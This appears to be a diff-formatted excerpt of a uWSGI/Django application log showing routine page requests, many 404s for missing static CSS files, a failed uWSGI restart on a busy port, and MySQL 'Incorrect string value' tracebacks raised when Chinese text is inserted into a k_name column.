+[pid: 11057|app: 0|req: 1169/1470] 219.228.146.156 () {38 vars in 819 bytes} [Thu Jan 14 09:07:27 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1170/1471] 219.228.146.156 () {40 vars in 934 bytes} [Thu Jan 14 09:09:32 2021] GET /kind-manage/ => generated 7366 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1171/1472] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:09:33 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1172/1473] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:09:33 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1173/1474] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:09:33 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1174/1475] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:09:33 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1175/1476] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:09:33 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1176/1477] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:09:33 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1177/1478] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:09:33 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1178/1479] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:09:33 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1179/1480] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:09:33 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+*** Starting uWSGI 2.0.19.1 (64bit) on [Thu Jan 14 17:14:17 2021] ***
+compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 14 January 2021 03:06:44
+os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
+nodename: VM-0-8-centos
+machine: x86_64
+clock source: unix
+pcre jit disabled
+detected number of CPU cores: 1
+current working directory: /www/wwwroot/master
+detected binary path: /www/wwwroot/master/pyweb/bin/uwsgi
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+chdir() to /www/wwwroot/master
+your processes number limit is 3874
+your memory page size is 4096 bytes
+detected max file descriptor number: 100001
+!!! no /etc/mime.types file found !!!
+lock engine: pthread robust mutexes
+thunder lock: disabled (you can enable it with --thunder-lock)
+probably another instance of uWSGI is running on the same address (0.0.0.0:8000).
+bind(): Address already in use [core/socket.c line 769]
+[pid: 11057|app: 0|req: 1180/1481] 219.228.146.156 () {42 vars in 965 bytes} [Thu Jan 14 09:14:24 2021] GET /kind-manage/ => generated 7366 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1181/1482] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:14:24 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1182/1483] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:14:24 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1183/1484] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:14:24 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1184/1485] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:14:25 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1185/1486] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:14:25 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1186/1487] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:14:25 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 27 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1187/1488] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:14:25 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1188/1489] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:14:25 2021] GET /static/css/spinners.css => generated 3516 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1189/1490] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:14:25 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Internal Server Error: /kind-manage/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE5\\xB0\\x8F\\xE6\\x97\\xB6...' for column 'k_name' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 541, in kind_manage
+ models.Kind.objects.create(k_name=k_name)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE5\\xB0\\x8F\\xE6\\x97\\xB6...' for column 'k_name' at row 1")
+[pid: 11057|app: 0|req: 1190/1491] 219.228.146.156 () {48 vars in 1027 bytes} [Thu Jan 14 09:14:36 2021] POST /kind-manage/ => generated 206934 bytes in 105 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1191/1492] 219.228.146.156 () {40 vars in 934 bytes} [Thu Jan 14 09:14:38 2021] GET /kind-manage/? => generated 7366 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1192/1493] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:14:38 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1193/1494] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:14:38 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1194/1495] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:14:38 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1195/1496] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:14:38 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1196/1497] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:14:38 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1197/1498] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:14:38 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 21 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1198/1499] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:14:38 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1199/1500] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:14:38 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1200/1501] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:14:38 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1201/1502] 219.228.146.156 () {42 vars in 965 bytes} [Thu Jan 14 09:16:45 2021] GET /kind-manage/? => generated 7366 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1202/1503] 219.228.146.156 () {42 vars in 965 bytes} [Thu Jan 14 09:16:48 2021] GET /kind-manage/? => generated 7366 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1203/1504] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:16:50 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1205/1506] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:16:50 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1206/1507] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:16:50 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1207/1507] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:16:50 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1207/1508] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:16:50 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1208/1509] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:16:50 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 15 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1209/1510] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:16:50 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1210/1511] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:16:50 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1211/1512] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:16:50 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1212/1513] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:16:51 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1213/1514] 219.228.146.156 () {42 vars in 965 bytes} [Thu Jan 14 09:16:52 2021] GET /kind-manage/ => generated 7366 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1214/1515] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:16:52 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1215/1516] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:16:52 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1216/1517] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:16:53 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1217/1518] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:16:53 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1218/1519] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:16:53 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1219/1520] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:16:53 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1220/1521] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:16:53 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1221/1522] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:16:53 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1222/1523] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:16:53 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Internal Server Error: /kind-manage/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE4\\xBD\\xA0\\xE5\\xA5\\xBD...' for column 'k_name' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 541, in kind_manage
+ models.Kind.objects.create(k_name=k_name)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
